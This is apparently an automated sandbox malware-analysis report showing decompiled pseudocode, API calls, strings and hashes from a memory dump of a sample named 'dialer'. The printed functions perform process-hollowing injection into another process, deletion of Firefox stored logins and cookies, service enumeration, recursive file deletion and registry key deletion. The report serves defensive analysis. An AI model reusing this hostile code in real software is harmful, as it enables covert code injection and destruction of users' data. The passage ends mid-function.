							_t73 = VirtualAllocEx(_t116->hProcess,  *(_t95 + 0x34),  *(_t95 + 0x50), 0x3000, 0x40);
							_v24 = _t73;
							if(_t73 == 0) {
								goto L20;
							} else {
								_t113 = _v16;
								if(WriteProcessMemory(_t116->hProcess, _t73, _t113,  *(_t95 + 0x54), 0) == 0) {
									goto L20;
								}
								_v12 = _v12 & 0x00000000;
								if(0 >=  *(_t95 + 6)) {
									L14:
									_t98 = _t95 + 0x34;
									_t114 = _v20;
									if(_v8 ==  *_t98) {
										L17:
										_t114->Eax =  *((intOrPtr*)(_t95 + 0x28)) + _v24;
										_t48 =  &(_t116->hThread); // 0xffffdcf2
										if(SetThreadContext( *_t48, _t114) == 0) {
											goto L20;
										}
										_t49 =  &(_t116->hThread); // 0xffffdcf2
										if(ResumeThread( *_t49) == 0xffffffff) {
											goto L20;
										}
										_t58 = 1;
										goto L22;
									}
									_t83 = WriteProcessMemory(_t116->hProcess, _t114->Ebx + 8, _t98, 4, 0);
									if(_t83 != 0) {
										goto L17;
									}
									TerminateProcess(_t116->hProcess, _t83);
									goto L21;
								}
								_t104 = 0;
								_v16 = 0;
								do {
									_t28 = _t113 + 0x3c; // 0x83ffc983
									WriteProcessMemory( *_t116,  *((intOrPtr*)( *_t28 + _t104 + _t113 + 0x104)) + _v24,  *((intOrPtr*)( *_t28 + _t104 + _t113 + 0x10c)) + _t113,  *( *_t28 + _t104 + _t113 + 0x108), 0);
									_t102 = _v12 + 1;
									_t104 = _v16 + 0x28;
									_v12 = _t102;
									_v16 = _t104;
								} while (_t102 < ( *(_t95 + 6) & 0x0000ffff));
								goto L14;
							}
						}
					}
					_t58 = 0;
					goto L23;
				}
				return 0;
			}

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5319d87f77d13d0da7680f496d65e7ebbc452ef30f5b3c9d37d6d9322d7f54d
Instruction ID: bbd19ceeb5de074bceafc2ad491a45c1a0c1387eac9ecb65e4147fd8eb7bbb52
Opcode Fuzzy Hash: e5319d87f77d13d0da7680f496d65e7ebbc452ef30f5b3c9d37d6d9322d7f54d
Instruction Fuzzy Hash: EA519D71600604FFEB108FA5CC45FAABBB9FF44742F104065F644E62A1E735EA90DB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040A3AF, Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040A3AF(void* __ebx, void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				struct _WIN32_FIND_DATAA _v468;
				void* __esi;
				void* __ebp;
				void* _t45;
				signed int _t58;
				signed int _t59;
				signed int _t73;
				signed int _t75;
				char* _t108;
				signed int _t109;
				char* _t129;
				void* _t130;
				void* _t134;
				void* _t135;
				void* _t136;
				void* _t137;

				_t142 = __eflags;
				_t134 = __edi;
				_t89 = __ebx;
				E004020B5(__ebx,  &_v100);
				E004020B5(__ebx,  &_v76);
				E004020B5(__ebx,  &_v28);
				_t45 = E00402064(_t89,  &_v124, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
				L00401FB1( &_v28, _t46, _t135, E004075C4(_t89,  &_v52, E0043919A(_t89, __eflags, "UserProfile"), _t134, _t142, _t45));
				L00401FA7();
				L00401FA7();
				_t128 =  &_v28;
				_t136 = FindFirstFileA(L00401F75(E0040755A( &_v124,  &_v28, _t142, "*")),  &_v468);
				L00401FA7();
				_t143 = _t136 - 0xffffffff;
				if(_t136 != 0xffffffff) {
					while(1) {
						L15:
						__eflags = FindNextFileA(_t136,  &_v468);
						if(__eflags == 0) {
							break;
						}
						__eflags = _v468.dwFileAttributes & 0x00000010;
						if((_v468.dwFileAttributes & 0x00000010) == 0) {
							continue;
						}
						_t108 =  &(_v468.cFileName);
						__eflags =  *_t108 - 0x2e;
						if( *_t108 != 0x2e) {
							L5:
							_t129 =  &(_v468.cFileName);
							_t109 = 0;
							__eflags = 0;
							while(1) {
								_t58 =  *(_t129 + _t109) & 0x000000ff;
								_t130 = "..";
								__eflags = _t58 -  *((intOrPtr*)(_t130 + _t109));
								_t128 =  &(_v468.cFileName);
								if(_t58 !=  *((intOrPtr*)(_t130 + _t109))) {
									break;
								}
								_t109 = _t109 + 1;
								__eflags = _t109 - 3;
								if(_t109 != 3) {
									continue;
								}
								_t59 = 0;
								L10:
								__eflags = _t59;
								if(__eflags != 0) {
									L00401FB1( &_v100, _t61, _t136, E0040530D(_t89,  &_v52, E0040755A( &_v148,  &_v28, __eflags,  &(_v468.cFileName)), _t134, __eflags, "\\logins.json"));
									L00401FA7();
									L00401FA7();
									_t128 = E0040755A( &_v52,  &_v28, __eflags,  &(_v468.cFileName));
									L00401FB1( &_v76, _t67, _t136, E0040530D(_t89,  &_v148, _t67, _t134, __eflags, "\\key3.db"));
									L00401FA7();
									L00401FA7();
									_t73 = DeleteFileA(L00401F75( &_v100));
									__eflags = _t73;
									if(_t73 == 0) {
										GetLastError();
									}
									_t75 = DeleteFileA(L00401F75( &_v76));
									__eflags = _t75;
									if(_t75 == 0) {
										GetLastError();
									}
								}
								goto L15;
							}
							asm("sbb eax, eax");
							_t59 = _t58 | 0x00000001;
							__eflags = _t59;
							goto L10;
						}
						__eflags =  *(_t108 + 1) & 0x000000ff;
						if(( *(_t108 + 1) & 0x000000ff) == 0) {
							continue;
						}
						goto L5;
					}
					E00402064(_t89, _t137 - 0x18, "\n[Firefox StoredLogins Cleared!]");
					E0040AA8C(_t89, _t128, __eflags);
					FindClose(_t136);
					goto L17;
				} else {
					FindClose(_t136);
					E00402064(_t89, _t137 - 0x18, "\n[Firefox StoredLogins not found]");
					E0040AA8C(_t89,  &_v28, _t143);
					L17:
					L00401FA7();
					L00401FA7();
					L00401FA7();
					return 1;
				}
			}

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A42E
FindClose.KERNEL32(00000000), ref: 0040A448
FindNextFileA.KERNEL32(00000000,?), ref: 0040A57F
FindClose.KERNEL32(00000000), ref: 0040A5A5

Strings

\key3.db, xrefs: 0040A509
[Firefox StoredLogins not found], xrefs: 0040A453
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040A3D1
[Firefox StoredLogins Cleared!], xrefs: 0040A592
UserProfile, xrefs: 0040A3DF
\logins.json, xrefs: 0040A4C7

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
API String ID: 1164774033-3681987949
Opcode ID: 97f7e2f54df5a1cdee6a28329f9dcdda7ea771a6a33053010f7c568708f73f53
Instruction ID: fceb70f3503f9a85c82f74107e9b35daee5a72393052f256031c89f00bf2afe6
Opcode Fuzzy Hash: 97f7e2f54df5a1cdee6a28329f9dcdda7ea771a6a33053010f7c568708f73f53
Instruction Fuzzy Hash: 22513C309102195ACB14FBB1DC5AEEEB774AF11309F50017FE406B60E2EF7C5A49CA5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A5CA, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 143
fileCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040A5CA(void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				struct _WIN32_FIND_DATAA _v444;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t35;
				signed int _t56;
				signed int _t57;
				long _t68;
				char* _t92;
				signed int _t93;
				void* _t102;
				char* _t105;
				void* _t106;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;

				_t116 = __eflags;
				_t108 = __edi;
				E004020B5(0,  &_v52);
				E004020B5(0,  &_v28);
				_t35 = E00402064(0,  &_v100, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
				L00401FB1( &_v28, _t36, _t109, E004075C4(0,  &_v76, E0043919A(0, __eflags, "UserProfile"), _t108, _t116, _t35));
				L00401FA7();
				L00401FA7();
				_t104 =  &_v28;
				_t110 = FindFirstFileA(L00401F75(E0040755A( &_v100,  &_v28, _t116, "*")),  &_v444);
				L00401FA7();
				_t117 = _t110 - 0xffffffff;
				if(_t110 != 0xffffffff) {
					__eflags = FindNextFileA(_t110,  &_v444);
					if(__eflags == 0) {
						L17:
						E00402064(0, _t111 - 0x18, "\n[Firefox Cookies not found]");
						E0040AA8C(0, _t104, __eflags);
						FindClose(_t110);
						goto L18;
					} else {
						__eflags = 0;
						do {
							__eflags = _v444.dwFileAttributes & 0x00000010;
							if((_v444.dwFileAttributes & 0x00000010) == 0) {
								goto L16;
							} else {
								_t92 =  &(_v444.cFileName);
								__eflags =  *_t92 - 0x2e;
								if( *_t92 != 0x2e) {
									L8:
									_t105 =  &(_v444.cFileName);
									_t93 = 0;
									while(1) {
										_t56 =  *(_t105 + _t93) & 0x000000ff;
										_t106 = "..";
										__eflags = _t56 -  *((intOrPtr*)(_t106 + _t93));
										_t104 =  &(_v444.cFileName);
										if(_t56 !=  *((intOrPtr*)(_t106 + _t93))) {
											break;
										}
										_t93 = _t93 + 1;
										__eflags = _t93 - 3;
										if(_t93 != 3) {
											continue;
										} else {
											_t57 = 0;
										}
										L13:
										__eflags = _t57;
										if(__eflags == 0) {
											goto L16;
										} else {
											_t104 = E0040755A( &_v124,  &_v28, __eflags,  &(_v444.cFileName));
											L00401FB1( &_v52, _t59, _t110, E0040530D(0,  &_v76, _t59, _t108, __eflags, "\\cookies.sqlite"));
											L00401FA7();
											L00401FA7();
											__eflags = DeleteFileA(L00401F75( &_v52));
											if(__eflags != 0) {
												_t102 = _t111 - 0x18;
												_push("\n[Firefox cookies found, cleared!]");
												goto L2;
											} else {
												_t68 = GetLastError();
												__eflags = _t68 != 0;
												if(_t68 != 0) {
													FindClose(_t110);
												} else {
													goto L16;
												}
											}
										}
										goto L19;
									}
									asm("sbb eax, eax");
									_t57 = _t56 | 0x00000001;
									__eflags = _t57;
									goto L13;
								} else {
									__eflags =  *(_t92 + 1) & 0x000000ff;
									if(( *(_t92 + 1) & 0x000000ff) == 0) {
										goto L16;
									} else {
										goto L8;
									}
								}
							}
							goto L19;
							L16:
							__eflags = FindNextFileA(_t110,  &_v444);
						} while (__eflags != 0);
						goto L17;
					}
				} else {
					FindClose(_t110);
					_t102 = _t111 - 0x18;
					_push("\n[Firefox Cookies not found]");
					L2:
					E00402064(0, _t102);
					E0040AA8C(0, _t104, _t117);
					L18:
				}
				L19:
				L00401FA7();
				L00401FA7();
				return 1;
			}

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A642
FindClose.KERNEL32(00000000), ref: 0040A658
FindNextFileA.KERNEL32(00000000,?), ref: 0040A682
DeleteFileA.KERNEL32(00000000,00000000), ref: 0040A72A
GetLastError.KERNEL32 ref: 0040A734
FindNextFileA.KERNEL32(00000000,00000010), ref: 0040A748
FindClose.KERNEL32(00000000), ref: 0040A76E
FindClose.KERNEL32(00000000), ref: 0040A78F

Strings

\cookies.sqlite, xrefs: 0040A6EB
[Firefox Cookies not found], xrefs: 0040A663, 0040A75B
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040A5E5
UserProfile, xrefs: 0040A5F3
[Firefox cookies found, cleared!], xrefs: 0040A79C

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: Find$File$Close$Next$DeleteErrorFirstLast
String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 532992503-432212279
Opcode ID: 0d64f0fd255b8ee415b355969872e335040334bbf39fd31d40a8ecc0d88fdc24
Instruction ID: a0e0b87e43e1ffccf28ad4a7bbdc78d64d502d6bba83e6bf3342b17ddf37f993
Opcode Fuzzy Hash: 0d64f0fd255b8ee415b355969872e335040334bbf39fd31d40a8ecc0d88fdc24
Instruction Fuzzy Hash: 32417C309002196ACB14FB75CC569EE7738AF11305F50417BE805B71D2EF3D9A4ACA9A

Uniqueness

Uniqueness Score: -1.00%

Function 00415A7A, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 226
serviceCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00415A7A(intOrPtr __ecx) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				struct _QUERY_SERVICE_CONFIG* _v24;
				void* _v28;
				intOrPtr _v32;
				short** _v36;
				intOrPtr _v40;
				char _v64;
				char _v88;
				char _v112;
				char _v136;
				struct _ENUM_SERVICE_STATUS _v172;
				void* __ebx;
				void* __edi;
				struct _ENUM_SERVICE_STATUS* _t87;
				void* _t100;
				void* _t107;
				int _t108;
				long _t110;
				void* _t133;
				intOrPtr _t198;
				short** _t199;
				int _t201;
				intOrPtr _t202;
				int _t203;

				_t198 = __ecx;
				_v40 = __ecx;
				_t133 = OpenSCManagerA(0, 0, 4);
				if(_t133 != 0) {
					L00401F4D(_t133,  &_v88);
					_v12 = 0;
					_t5 =  &_v8; // 0x41557b
					_v8 = 0;
					_v20 = 0;
					__eflags = EnumServicesStatusW(_t133, 0x3b, 3,  &_v172, 0,  &_v12, _t5,  &_v20);
					if(__eflags != 0) {
						L12:
						CloseServiceHandle(_t133);
						E004032FA(_t133, _t198, __eflags,  &_v88);
						L00401ED0();
						L13:
						return _t198;
					}
					__eflags = GetLastError() - 0xea;
					if(__eflags != 0) {
						goto L12;
					}
					_t201 = _v12;
					_push(_t201);
					_t87 = L00438E06( &_v88);
					_v36 = _t87;
					_t13 =  &_v8; // 0x41557b
					EnumServicesStatusW(_t133, 0x3b, 3, _t87, _t201,  &_v12, _t13,  &_v20);
					_t202 = 0;
					_v32 = 0;
					__eflags = _v8;
					if(__eflags <= 0) {
						L11:
						L00438E01(_v36);
						goto L12;
					}
					_t199 = _v36;
					do {
						E004032F1(E004043E5(_t133,  &_v112, _t199[1], __eflags, E0040425F(_t133,  &_v64, 0x4659b4)));
						L00401ED0();
						L00401ED0();
						E004032F1(E004043E5(_t133,  &_v64,  *_t199, __eflags, E0040425F(_t133,  &_v112, 0x4659b4)));
						L00401ED0();
						L00401ED0();
						_t100 = E0040425F(_t133,  &_v136, 0x4659b4);
						E004032F1(E00403010( &_v64, E00416BF7(_t133,  &_v112, _t199[3]), _t100));
						L00401ED0();
						L00401ED0();
						L00401ED0();
						_v16 = _v16 & 0x00000000;
						_t107 = OpenServiceW(_t133,  *_t199, 1);
						_v28 = _t107;
						_t108 = QueryServiceConfigW(_t107, _v24, 0,  &_v16);
						__eflags = _t108;
						if(_t108 == 0) {
							_t110 = GetLastError();
							__eflags = _t110 - 0x7a;
							if(_t110 == 0x7a) {
								_t203 = _v16;
								_push(_t203);
								_v24 = L00438E06( &_v16);
								_t204 = _v24;
								QueryServiceConfigW(_v28, _v24, _t203,  &_v16);
								E004032F1(E00403086(_t133,  &_v136, E00416BF7(_t133,  &_v64,  *_v24), _t199, __eflags, 0x4659b4));
								L00401ED0();
								L00401ED0();
								E004032F1(E00403086(_t133,  &_v136, E00416BF7(_t133,  &_v64,  *((intOrPtr*)(_t204 + 4))), _t199, __eflags, 0x4659b4));
								L00401ED0();
								L00401ED0();
								E004032F1(E00403086(_t133,  &_v136, E004043E5(_t133,  &_v64,  *((intOrPtr*)(_t204 + 0xc)), __eflags, E0040425F(_t133,  &_v112, 0x4659b4)), _t199, __eflags, "\n"));
								L00401ED0();
								L00401ED0();
								L00401ED0();
								L00438E01(_t204);
								_t202 = _v32;
							}
						}
						CloseServiceHandle(_v28);
						_t202 = _t202 + 1;
						_t199 =  &(_t199[9]);
						_v32 = _t202;
						__eflags = _t202 - _v8;
					} while (__eflags < 0);
					_t198 = _v40;
					goto L11;
				}
				E0040425F(_t133, _t198, 0x45f714);
				goto L13;
			}

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,?,0046BACC,0046C980), ref: 00415A91
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,{UA,?), ref: 00415AD8
GetLastError.KERNEL32(?,0046BACC,0046C980), ref: 00415AE6
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,{UA,?), ref: 00415B17
OpenServiceW.ADVAPI32(00000000,?,00000001,00000000,004659B4,00000000,004659B4,00000000,004659B4,?,0046BACC,0046C980), ref: 00415BE7

Strings

{UA, xrefs: 00415ABD, 00415B08, 00415D14, 00415AC3, 00415B0B

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: EnumOpenServicesStatus$ErrorLastManagerService
String ID: {UA
API String ID: 2247270020-1643284148
Opcode ID: 28716e983f56f9bf6c6d9c4286e9c4ae90f222c326ceeb8a566e1157bbe1416e
Instruction ID: 2ada6be536c103ea9e2eb214abc328ada890e6f3689920fc5719b35e93efa4c7
Opcode Fuzzy Hash: 28716e983f56f9bf6c6d9c4286e9c4ae90f222c326ceeb8a566e1157bbe1416e
Instruction Fuzzy Hash: E9816071D00208ABCB14EB92DC569EEB739EF54345F10806EF516B61E1EF386B49CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004170AC, Relevance: 13.6, APIs: 9, Instructions: 147
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004170AC(WCHAR* __ecx) {
				char _v5;
				WCHAR* _v12;
				short _v532;
				short _v1052;
				struct _WIN32_FIND_DATAW _v1644;
				signed int _t52;
				intOrPtr _t53;
				char _t54;
				short _t55;
				signed int _t56;
				intOrPtr _t57;
				char _t58;
				signed int _t63;
				char _t68;
				void _t72;
				void _t73;
				signed int _t78;
				signed int _t84;
				void* _t86;
				intOrPtr* _t89;
				signed short* _t90;
				void* _t91;
				signed int _t95;
				void* _t100;
				void* _t102;
				signed short* _t103;
				void* _t106;
				void* _t107;
				signed int _t108;
				intOrPtr* _t110;
				void* _t112;
				void* _t118;
				void* _t120;
				void* _t123;
				void* _t124;

				_v12 = __ecx;
				_t103 = __ecx;
				_t118 =  &_v1052 - __ecx;
				do {
					_t52 =  *_t103 & 0x0000ffff;
					 *(_t118 + _t103) = _t52;
					_t103 =  &(_t103[1]);
				} while (_t52 != 0);
				_t89 =  &_v1052 - 2;
				do {
					_t53 =  *((intOrPtr*)(_t89 + 2));
					_t89 = _t89 + 2;
				} while (_t53 != 0);
				_t54 = L"\\*"; // 0x2a005c
				 *_t89 = _t54;
				_t106 =  &_v532 - __ecx;
				_t55 =  *0x465908; // 0x0
				 *((short*)(_t89 + 4)) = _t55;
				_t90 = __ecx;
				do {
					_t56 =  *_t90 & 0x0000ffff;
					 *(_t106 + _t90) = _t56;
					_t90 =  &(_t90[1]);
				} while (_t56 != 0);
				_t110 =  &_v532 - 2;
				do {
					_t57 =  *((intOrPtr*)(_t110 + 2));
					_t110 = _t110 + 2;
				} while (_t57 != 0);
				_t58 = "\\"; // 0x5c
				 *_t110 = _t58;
				_t86 = FindFirstFileW( &_v1052,  &_v1644);
				if(_t86 == 0xffffffff) {
					L34:
					return 0;
				}
				_t91 = 0;
				do {
					_t63 =  *(_t123 + _t91 - 0x210) & 0x0000ffff;
					_t91 = _t91 + 2;
					 *(_t123 + _t91 - 0x41a) = _t63;
				} while (_t63 != 0);
				_v5 = 1;
				do {
					if(FindNextFileW(_t86,  &_v1644) == 0) {
						if(GetLastError() != 0x12) {
							L33:
							FindClose(_t86);
							goto L34;
						}
						_t68 = 0;
						_v5 = 0;
						goto L23;
					}
					if(E00417036( &(_v1644.cFileName)) != 0) {
						L22:
						_t68 = _v5;
						goto L23;
					}
					_t107 =  &(_v1644.cFileName);
					_t120 = _t107;
					do {
						_t72 =  *_t107;
						_t107 = _t107 + 2;
					} while (_t72 != 0);
					_t108 = _t107 - _t120;
					_t112 =  &_v532 - 2;
					do {
						_t73 =  *(_t112 + 2);
						_t112 = _t112 + 2;
					} while (_t73 != 0);
					_t95 = _t108 >> 2;
					memcpy(_t112, _t120, _t95 << 2);
					memcpy(_t120 + _t95 + _t95, _t120, _t108 & 0x00000003);
					_t124 = _t124 + 0x18;
					if((_v1644.dwFileAttributes & 0x00000010) == 0) {
						if((_v1644.dwFileAttributes & 0x00000001) != 0) {
							SetFileAttributesW( &_v532, 0x80);
						}
						if(DeleteFileW( &_v532) == 0) {
							goto L33;
						} else {
							_t100 = 0;
							do {
								_t78 =  *(_t123 + _t100 - 0x418) & 0x0000ffff;
								_t100 = _t100 + 2;
								 *(_t123 + _t100 - 0x212) = _t78;
							} while (_t78 != 0);
							goto L22;
						}
					}
					if(E004170AC( &_v532) == 0) {
						goto L33;
					}
					RemoveDirectoryW( &_v532);
					_t102 = 0;
					do {
						_t84 =  *(_t123 + _t102 - 0x418) & 0x0000ffff;
						_t102 = _t102 + 2;
						 *(_t123 + _t102 - 0x212) = _t84;
					} while (_t84 != 0);
					goto L22;
					L23:
				} while (_t68 != 0);
				FindClose(_t86);
				return RemoveDirectoryW(_v12);
			}

APIs

FindFirstFileW.KERNEL32(?,?,?,?,0046C238), ref: 00417143
FindNextFileW.KERNEL32(00000000,?,?,?,0046C238), ref: 0041717A
RemoveDirectoryW.KERNEL32(?,?,?,0046C238), ref: 004171F4
FindClose.KERNEL32(00000000,?,?,0046C238), ref: 00417222
RemoveDirectoryW.KERNEL32(?,?,?,0046C238), ref: 0041722B
SetFileAttributesW.KERNEL32(?,00000080,?,?,0046C238), ref: 00417248
DeleteFileW.KERNEL32(?,?,?,0046C238), ref: 00417255
GetLastError.KERNEL32(?,?,0046C238), ref: 0041727D
FindClose.KERNEL32(00000000,?,?,0046C238), ref: 00417290

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
String ID:
API String ID: 2341273852-0
Opcode ID: fe33a7ecd763378ccfdde08d8187e5d99106823fa4ca85dde7b5a7b3d181c472
Instruction ID: f55fdd06e51736921a03e431044bfc406960ad07d078f96de4dc955a1c0aff70
Opcode Fuzzy Hash: fe33a7ecd763378ccfdde08d8187e5d99106823fa4ca85dde7b5a7b3d181c472
Instruction Fuzzy Hash: 4C5105345042198ACF24DF68CC84AFAB7B5BF58305F5045EAE84993251EB359ECBCB98

Uniqueness

Uniqueness Score: -1.00%

Function 00410BF5, Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 479
registrylibraryloaderCOMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E00410BF5(void* __edx, void* __eflags, char _a8) {
				char _v36;
				char _v48;
				char _v52;
				char _v68;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				struct _SECURITY_ATTRIBUTES _v104;
				char _v108;
				void* _v112;
				char _v120;
				intOrPtr _v124;
				char _v128;
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				void* _t88;
				void* _t99;
				void* _t101;
				void* _t102;
				void* _t104;
				signed int _t105;
				void* _t113;
				void* _t120;
				void* _t121;
				void* _t123;
				void* _t127;
				signed short* _t135;
				void* _t137;
				void* _t141;
				void* _t146;
				void* _t150;
				void* _t152;
				void* _t153;
				void* _t155;
				signed int _t156;
				intOrPtr* _t158;
				void* _t160;
				void* _t162;
				void* _t163;
				void* _t165;
				void* _t171;
				void* _t173;
				void* _t174;
				void* _t176;
				void* _t181;
				void* _t182;
				long _t185;
				signed short* _t195;
				void* _t205;
				void* _t217;
				void* _t233;
				void* _t247;
				signed int _t258;
				signed int _t313;
				signed int _t323;
				signed int _t326;
				void* _t328;
				void* _t330;
				void* _t335;
				void* _t337;
				void* _t339;
				signed int _t340;
				void* _t341;
				signed int _t347;
				signed int _t348;
				void* _t351;
				void* _t352;
				void* _t353;
				void* _t356;
				void* _t361;
				void* _t362;
				void* _t364;
				void* _t365;
				void* _t367;
				void* _t368;
				void* _t369;
				void* _t370;
				void* _t372;
				void* _t374;
				void* _t379;

				_t379 = __eflags;
				_t320 = __edx;
				_push(_t203);
				_t77 = L00401F75( &_a8);
				_push(0xffffffff);
				_t328 = 4;
				_push(_t328);
				_push( &_v52);
				E00404286( &_a8);
				_t351 = (_t348 & 0xfffffff8) - 0x44;
				E004020CC(_t203, _t351, __edx, _t379, 0x46c238);
				_t352 = _t351 - 0x18;
				E004020CC(_t203, _t352, __edx, _t379,  &_v68);
				E00416DD0( &_v108, __edx);
				_t353 = _t352 + 0x30;
				_t335 =  *_t77 - 0x35;
				if(_t335 == 0) {
					L00401F4D(_t203,  &_v76);
					__eflags = E004021D5( &_v88) - 1;
					if(__eflags > 0) {
						L00409DCB(_t203,  &_v80, L00401F75(L00401E29( &_v88, _t320, __eflags, 1)));
					}
					E004020CC(_t203, _t353 - 0x18, _t320, __eflags, L00401E29( &_v88, _t320, __eflags, 0));
					_t88 = L00401ECB( &_v84);
					_t320 = 1;
					_t217 = _t88;
					L37:
					E00410A36(_t217, _t320, _t386);
					L38:
					L00401ED0();
					L39:
					L00401E54( &_v88, _t320);
					L00401FA7();
					L00401FA7();
					return 0;
				}
				_t337 = _t335 - 1;
				if(_t337 == 0) {
					_t99 = L00401F75(L00401E29( &_v88, __edx, __eflags, 2));
					_t101 = L00401F75(L00401E29( &_v92, __edx, __eflags, 1));
					_t330 = 0;
					_t102 = L00401E29( &_v96, __edx, __eflags, 0);
					_t356 = _t353 - 0x18;
					E004020CC(_t203, _t356, _t320, __eflags, _t102);
					_t104 = E004109A5(_t203, __eflags, _t99);
					_t320 = _t101;
					_t105 = E0041074C(_t104, _t101);
					_t358 = _t356 + 0x18 - 0x18;
					_t233 = _t356 + 0x18 - 0x18;
					__eflags = _t105;
					if(__eflags == 0) {
						_push("2");
						L33:
						E00402064(_t203, _t233);
						E00404A6E(_t203, 0x46c6e8, _t320, __eflags);
						goto L39;
					}
					_push("1");
					L20:
					E00402064(_t203, _t233);
					E00404A6E(_t203, 0x46c6e8, _t320, __eflags);
					E004020CC(_t203, _t358 - 0x18, _t320, __eflags, L00401E29( &_v120, _t320, __eflags, _t330));
					_t113 = L00401F75(L00401E29( &_v128, _t320, __eflags, 1));
					_t320 = 0;
					E00410A36(_t113, 0, __eflags);
					goto L39;
				}
				_t339 = _t337 - 1;
				if(_t339 == 0) {
					E0040425F(_t203,  &_v80, L00401F75(L00401E29( &_v88, __edx, __eflags, 1)));
					 *0x46bd64 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), "SHDeleteKeyW");
					_t120 = L00401ECB( &_v84);
					_t121 = L00401E29( &_v96, _t320, __eflags, 0);
					_t361 = _t353 - 0x18;
					E004020CC(_t203, _t361, _t320, __eflags, _t121);
					_t123 = E004109A5(_t203, __eflags, _t120);
					_t362 = _t361 + 0x18;
					__eflags =  *0x46bd64(_t123);
					if(__eflags != 0) {
						_t247 = _t362 - 0x18;
						_push("9");
						L12:
						E00402064(_t203, _t247);
						E00404A6E(_t203, 0x46c6e8, _t320, __eflags);
						goto L38;
					}
					_t127 = E00402469();
					_t340 = 2;
					_t203 = E0041123C( &_v84, "\\", _t127 - _t340);
					__eflags = _t203 - 0xffffffff;
					if(__eflags != 0) {
						_t50 = _t203 + 1; // 0x1
						_push( ~(__eflags > 0) | _t50 * _t340);
						_v100 = L0042EE1E( ~(__eflags > 0) | _t50 * _t340, _t50 * _t340 >> 0x20, _t340, __eflags);
						_t135 = L00401ECB(E0040730B( &_v84,  &_v36, 0, _t203));
						_t203 = _v112;
						_t323 = _v112 - _t135;
						__eflags = _t323;
						do {
							_t258 =  *_t135 & 0x0000ffff;
							 *(_t323 + _t135) = _t258;
							_t135 = _t135 + _t340;
							__eflags = _t258;
						} while (__eflags != 0);
						L00401ED0();
						_t137 = L00401E29( &_v96, _t323, __eflags, 0);
						_t364 = _t362 - 0x18;
						E004020CC(_t203, _t364, _t323, __eflags, _t137);
						_t320 = 0;
						__eflags = 0;
						E00410A36(_t203, 0, 0);
						L0042EE27(_t203);
						_t365 = _t364 + 0x1c;
						L28:
						_t247 = _t365 - 0x18;
						_push("8");
						goto L12;
					}
					_t141 = L00401E29( &_v96, _t320, __eflags, 0);
					_t367 = _t362 - 0x18;
					E004020CC(_t203, _t367, _t320, __eflags, _t141);
					_t320 = 0;
					E00410A36(0, 0, __eflags);
					_t365 = _t367 + 0x18;
					goto L28;
				}
				_t341 = _t339 - 1;
				if(_t341 == 0) {
